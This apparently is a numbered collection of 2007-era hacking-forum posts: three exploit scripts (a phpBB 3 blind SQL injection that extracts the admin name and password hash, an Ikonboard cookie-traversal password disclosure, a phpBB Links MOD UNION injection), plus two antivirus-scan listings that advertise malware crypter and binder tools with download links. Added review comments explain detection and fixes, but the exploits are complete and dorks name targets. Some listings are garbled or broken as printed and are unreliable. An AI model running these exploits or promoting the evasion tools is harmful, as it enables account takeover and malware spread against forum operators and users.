
  1. #!/usr/bin/php -q -d short_open_tag=on 
    <?
    // Banner, usage text and runtime settings for the script below.
    // NOTE(review): the short open tag `<?` only parses because the shebang
    // passes -d short_open_tag=on; under a default php.ini this file is plain text.
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
    echo "by rgod [email]rgod@autistici.org[/email]\n";
    echo "site: http://retrogod.altervista.org\n";
    echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

    /*
    works regardless of php.ini settings
    you need a global moderator account with "simple moderator" role
    */

    // At least four positional arguments are required (host path user pass);
    // everything from $argv[3] on is also scanned for options further down.
    if ($argc<5) {
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
    echo "host: target server (ip/hostname)\n";
    echo "path: path to phpbb3\n";
    echo "user/pass: u need a valid user account with global moderator rights\n";
    echo "Options:\n";
    echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
    echo " -p[port]: specify a port other than 80\n";
    echo " -P[ip:port]: specify a proxy\n";
    echo " -u[number]: specify a user id other than 2 (admin)\n";
    echo " -x: disclose table prefix through error messages\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
    die;
    }

    // Silence notices/warnings and lift the execution time limit: the per-byte
    // loops below pause 2 s after every recovered byte and can run for minutes.
    // The socket timeout (seconds) is what the fsockopen() calls in
    // sendpacketii() use, since they pass no explicit timeout.
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    // Hex/ASCII dump helper. Not called anywhere in this listing (the only
    // response debugging is the commented-out echo in sendpacketii()).
    // Returns the hex bytes, a CRLF, then the printable rendering, 15 bytes per
    // line; bytes <= 32 or > 126 are rendered as ".".
    function quick_dump($string)
    {
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++)
    {
    // `|` is the bitwise OR; both operands are booleans here so it behaves like `||`.
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    {$result.=" .";}
    else
    {$result.=" ".$string[$i];}
    // Left-pad single-digit hex values so every byte takes two columns.
    if (strlen(dechex(ord($string[$i])))==2)
    {$exa.=" ".dechex(ord($string[$i]));}
    else
    {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
    }
    // Pattern sendpacketii() uses to validate the -P value as ip:port.
    // NOTE(review): as printed the literal ends in `\'`, which inside a PHP
    // single-quoted string is an escaped quote, so the string is not closed on
    // this line; the trailing `\b)'` was probably lost when the post was rendered.
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\';
    // Sends one raw HTTP request ($packet) to $host:$port, or through the
    // ip:port proxy in $proxy, and leaves the whole response (headers and
    // body) in the global $html. Exits the process on any connection failure.
    function sendpacketii($packet)
    {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
    // No explicit timeout: default_socket_timeout set at the top applies.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
    echo 'No response from '.$host.':'.$port; die;
    }
    }
    else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
    echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
    echo 'No response from proxy...';die;
    }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
    // Direct connection: read until the server closes (Connection: Close is sent).
    $html='';
    while (!feof($ock)) {
    $html.=fgets($ock);
    }
    }
    else {
    // Via proxy: read one byte at a time until EOF has been reached AND a
    // CRLFCRLF header terminator has been seen. If the proxy closes the
    // connection before sending a blank line this loop never ends, because
    // fread() at EOF keeps returning "". eregi() was removed in PHP 7.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
    $html.=fread($ock,1);
    }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
    }

    // Positional arguments and option defaults.
    $host=$argv[1];
    $path=$argv[2];
    $user=$argv[3];
    $pass=$argv[4];
    $port=80;
    $prefix="PHPBB_";
    $user_id="2";//admin
    $discl=0;
    $proxy="";
    // Options are recognised by their first two characters. The scan starts at
    // $argv[3], so a user name or password that happens to begin with -p, -P,
    // -T, -u or -x is also treated as an option (the positional value is
    // already stored, so only the option variable is affected).
    for ($i=3; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p")
    {
    $port=str_replace("-p","",$argv[$i]);
    }
    if ($temp=="-P")
    {
    $proxy=str_replace("-P","",$argv[$i]);
    }
    if ($temp=="-T")
    {
    $prefix=str_replace("-T","",$argv[$i]);
    }
    if ($temp=="-u")
    {
    $user_id=str_replace("-u","",$argv[$i]);
    }
    if ($temp=="-x")
    {
    $discl=1;
    }
    }

    // The board path must start and end with "/"; `<>` is PHP's `!=`.
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    // Through a proxy the request target has to be an absolute URL.
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    // Log in through ucp.php?mode=login with the supplied account and collect
    // every Set-Cookie value from the response into $cookie for later requests.
    $data="username=".urlencode($user);
    $data.="&password=".urlencode($pass);
    $data.="&redirect=index.php";
    $data.="&login=Login";
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
    $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    $cookie="";
    // Each Set-Cookie header is cut at its first space, which keeps the
    // "name=value;" part and drops the attributes.
    $temp=explode("Set-Cookie: ",$html);
    for ($i=1; $i<=count($temp)-1; $i++)
    {
    $temp2=explode(" ",$temp[$i]);
    $cookie.=" ".$temp2[0];
    }
    // Login-failure check is disabled: the branch body is commented out, so
    // the script carries on even when the session cookie still names user 1
    // (presumably the anonymous user, i.e. the login did not take).
    if (eregi("_u=1;",$cookie))
    {
    //echo $html."\n";//debug
    //die("Unable to login...");
    }
    echo "cookie -> ".$cookie."\r\n";
    // -x: send a deliberately malformed ip value and read the table prefix back
    // out of the MySQL syntax error echoed in the page. This only works because
    // the raw database error text is returned to the user; not exposing SQL
    // error messages in responses is what closes this avenue.
    if ($discl)
    {
    $sql="'suntzuuuuu";
    echo "sql -> ".$sql."\n";
    $sql=urlencode(strtoupper($sql));
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cookie: ".$cookie." \r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    if (strstr($html,"You have an error in your SQL syntax"))
    {
    // The word before "posts" in the error text is taken as "<prefix>" .
    $temp=explode("posts",$html);
    $temp2=explode(" ",$temp[0]);
    $prefix=strtoupper($temp2[count($temp2)-1]);
    echo "prefix -> ".$prefix."\n";sleep(2);
    }
    }

    // Candidate byte values for an MD5 hex digest: NUL (end marker), '0'-'9', 'a'-'f'.
    $md5s[0]=0;//null
    $md5s=array_merge($md5s,range(48,57)); //numbers
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    //print_r(array_values($md5s));
    // Boolean-based blind extraction of USER_PASSWORD, one byte per request:
    // between requests only $j (position) and $i (candidate) change, and the
    // presence or absence of "No members found for this search criteria" in
    // the response is the oracle. Each recovered byte costs up to 17 requests
    // plus a 2 s pause, so from the server side this shows up as a long run
    // of near-identical memberlist.php mode=searchuser POSTs from one session
    // whose ip field is not an IP address — that is the signal to alert on,
    // and validating that field as an address (or binding it as a query
    // parameter) before it reaches SQL is the fix.
    $j=1;$password="";
    while (!strstr($password,chr(0)))
    {
    for ($i=0; $i<=255; $i++)
    {
    if (in_array($i,$md5s))
    {
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    echo "sql -> ".$sql."\n";
    $sql=urlencode(strtoupper($sql));
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cookie: ".$cookie." \r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
    }
    if ($i==255) {die("Exploit failed...");}
    }
    $j++;
    }

    // Same blind extraction loop for USERNAME; here all 256 byte values are
    // tried at each position. The progress line still says "password ->"
    // although the column being read is USERNAME.
    $j=1;$admin="";
    while (!strstr($admin,chr(0)))
    {
    for ($i=0; $i<=255; $i++)
    {
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    echo "sql -> ".$sql."\n";
    $sql=urlencode(strtoupper($sql));
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cookie: ".$cookie." \r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
    }
    if ($i==255) {die("Exploit failed...");}
    $j++;
    }
    // Summary of what was read back.
    echo "--------------------------------------------------------------------\r\n";
    echo "admin -> ".$admin."\r\n";
    echo "password (md5) -> ".$password."\r\n";
    echo "--------------------------------------------------------------------\r\n";

    // True when the trimmed value begins with 32 hex digits. The pattern has
    // no end anchor, so longer strings pass too. ereg() was removed in PHP 7.
    function is_hash($hash)
    {
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    else {return false;}
    }

    // Final verdict: only the shape of the recovered hash is checked.
    if (is_hash($password)) {echo "Exploit succeeded...";}
    else {echo "Exploit failed...";}
    ?>

  2. 001xg0.jpg

    AhnLab-V3	2007.9.1.0	2007.09.03	-
    AntiVir 7.4.1.66 2007.09.02 -
    Authentium 4.93.8 2007.09.02 -
    Avast 4.7.1029.0 2007.09.02 -
    AVG 7.5.0.484 2007.09.02 -
    CAT-QuickHeal 9.00 2007.09.01 -
    ClamAV 0.91.2 2007.09.02 -
    DrWeb 4.33 2007.09.03 -
    eSafe 7.0.15.0 2007.09.02 -
    eTrust-Vet 31.1.5100 2007.08.31 -
    Ewido 4.0 2007.09.02 -
    FileAdvisor 1 2007.09.03 -
    Fortinet 3.11.0.0 2007.09.03 -
    F-Prot 4.3.2.48 2007.09.02 -
    F-Secure 6.70.13030.0 2007.09.03 -
    Ikarus T3.1.1.12 2007.09.03 -
    Kaspersky 4.0.2.24 2007.09.03 -
    McAfee 5110 2007.08.31 -
    Microsoft 1.2803 2007.09.03 -
    NOD32v2 2498 2007.09.03 -
    Norman 5.80.02 2007.09.02 -
    Panda 9.0.0.4 2007.09.02 -
    Prevx1 V2 2007.09.03 -
    Rising 19.38.62.00 2007.09.02 -
    Sophos 4.21.0 2007.09.02 -
    Sunbelt 2.2.907.0 2007.08.31 -
    TheHacker 6.1.9.175 2007.09.02 -
    VBA32 3.12.2.3 2007.09.01 -
    VirusBuster 4.3.26:9 2007.09.02 -
    Webwasher-Gateway 6.0.1 2007.09.02 Win32.Malware.gen!88 (suspicious)

    Download: http://rapidshare.com/files/53038424/execrypt.rar

  3. #!/usr/bin/perl -w
    # NOTE(review): this listing was escaped a second time somewhere between the
    # author and the page (`\"`, `\'`, `\\n`, `\\.`); as printed it does not
    # parse. The comments describe the intent of each line.
    use strict;
    use LWP::UserAgent;
    use HTTP::Cookies;
    # Exactly three arguments; the host must contain a dot and the path must
    # start and end with "/". help() dies, so these act as guards.
    # Style: `&help` (no parens) calls through the old ampersand form and
    # passes the caller's @_; plain `help()` is the modern spelling. The /g
    # flag on a scalar-context match is unnecessary here and leaves pos() set.
    &help unless $#ARGV == 2;
    &help unless $ARGV[0] =~ m/^(.*)\\.(.*)/gi;
    &help unless $ARGV[2] =~ m/^\\/(.*)\\//gi;
    my $host = $ARGV[0];
    my $user = $ARGV[1];
    my $path = $ARGV[2];
    # Indirect-object syntax (`new Class`); LWP::UserAgent->new is preferred.
    # `our` makes these package globals where `my` would do.
    our $lwp = new LWP::UserAgent;
    $lwp -> agent(\"Ik0nb04d w4r3z by n0stur. ph33r bitchez!\");
    # One GET with a crafted cookie. LWP returns an HTTP::Response object even
    # for connection errors (status 500), so the `|| print` branch is
    # effectively dead and a failed request is only noticed by the content test.
    our $get = $lwp -> get(\"http://\".$host.\"/cgi-bin\".$path.\"search.cgi?action=display\", \'Cookie\' => \"amembernamecookie=../members/\".$user.\".cgi%00;\") || print \"\\n[-] $!\\n\";

    # $user is interpolated unescaped into the pattern; \Q$user\E would treat
    # it literally.
    if($get->content() =~ /$user/){ print \"\\n[*] Vulnerable\\n\";} else { &end; }

    # $1/$2 are used without checking that this match succeeded; on failure
    # they still hold the captures of the last successful match (the ARGV
    # checks above).
    $get->content() =~ /forum=(\\w+)&topic=(\\w+)/;
    print \"\\n[+] Username: \".$1.\"\\n\";
    print \"[+] Password: \".$2.\"\\n\";
    print \"Service provided by nostur. njoy, bitchez!\\n\";
    # Prints the usage banner (with $0 interpolated via qq^...^) and dies.
    sub help {
    print qq^
    Ikonboard all versions remote password disclosure
    Found by: anonymous...
    Code by: nostur
    ->Usage: $0 <host> <user> <path_to_ikonboard_in_cgibin>
    ^;
    die(\"\\nNot enough parameters, check the code...\\n\");
    }
    # Dies with the "not vulnerable" message; reached when the probe string is absent.
    sub end { die(\"\\n[-]Not Vulnerable\\n\"); }

    # notsec.com

  4. picpp8.th.jpg

    AhnLab-V3 2007.7.14.0 2007.07.17 no virus found

    AntiVir 7.4.0.42 2007.07.17 HEUR/Malware

    Authentium 4.93.8 2007.07.17 no virus found

    Avast 4.7.997.0 2007.07.17 no virus found

    AVG 7.5.0.476 2007.07.16 Dropper.Generic.NDH

    BitDefender 7.2 2007.07.17 no virus found

    CAT-QuickHeal 9.00 2007.07.17 no virus found

    ClamAV devel-20070416 2007.07.17 no virus found

    DrWeb 4.33 2007.07.17 no virus found

    eSafe 7.0.15.0 2007.07.17 no virus found

    eTrust-Vet 30.8.3789 2007.07.17 no virus found

    Ewido 4.0 2007.07.17 no virus found

    FileAdvisor 1 2007.07.17 no virus found

    Fortinet 2.91.0.0 2007.07.17 no virus found

    F-Prot 4.3.2.48 2007.07.17 no virus found

    Ikarus T3.1.1.8 2007.07.17 no virus found

    Kaspersky 4.0.2.24 2007.07.17 no virus found

    McAfee 5076 2007.07.17 MultiDropper-JD

    Microsoft 1.2704 2007.07.17 no virus found

    NOD32v2 2403 2007.07.17 no virus found

    Norman 5.80.02 2007.07.17 no virus found

    Panda 9.0.0.4 2007.07.17 Suspicious file

    Sophos 4.19.0 2007.07.16 no virus found

    Sunbelt 2.2.907.0 2007.07.16 no virus found

    Symantec 10 2007.07.17 no virus found

    TheHacker 6.1.7.148 2007.07.16 no virus found

    VBA32 3.12.2 2007.07.16 no virus found

    VirusBuster 4.3.23:9 2007.07.17 no virus found

    Webwasher-Gateway 6.0.1 2007.07.17 Heuristic.Malware

    Download: http://rapidshare.com/files/52421719/Adrenaline_Binder.rar

  5. #!/usr/bin/perl

    # NOTE(review): no `use strict; use warnings;` — every variable below is a
    # package global.
    print q{

    phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

    Bug discovered by Don
    Dork: allinurl:links.php?t=search
    or: "Links MOD v1.2.2 by phpBB2.de"
    SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

    };

    use IO::Socket;

    # Interactive prompts. `chop` removes the last character unconditionally;
    # `chomp` (newline only) is the safe form.
    print q{
    => Insert URL
    => without ( http )
    => };
    $server = <STDIN>;
    chop ($server);
    print q{
    => Insert directory
    => es: /forum/ - /phpBB2/
    => };
    $dir = <STDIN>;
    chop ($dir);
    print q{
    => User ID
    => Number:
    => };
    $user = <STDIN>;
    chop ($user);
    # Empty conditional and three @ARGV values that are never read — leftovers.
    if (!$ARGV[2]) {
    }
    $myuser = $ARGV[3];
    $mypass = $ARGV[4];
    $myid = $ARGV[5];
    # Strips a scheme the prompt already asked the user to omit; the /e flag
    # evaluates the empty replacement as code and adds nothing here.
    $server =~ s/(http:\/\/)//eg;
    $path = $dir;
    # The request line below is the detection signature: a links.php search
    # whose `start` parameter carries "UNION SELECT".
    $path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
    print "
    Exploit in process...\r\n";
    $socket = IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => "$server",
    PeerPort => "80") || die "Exploit failed";
    print "Exploit\r\n";
    print "in process...\r\n";
    print $socket "GET $path HTTP/1.1\r\n";
    print $socket "Host: $server\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    print "Exploit finished!\r\n\r\n";
    # Prints the first 32-character \w run in the response and exits; any
    # 32-char token (not only a hash) would match. `$1 ne 0` compares the
    # capture to the string "0" and is always true for hex text.
    while ($answer = <$socket>)
    {
    if ($answer =~/(\w{32})/)
    {
    if ($1 ne 0) {
    print "MD5-Hash is: ".$1."\r\n";
    }
    exit();
    }
    }
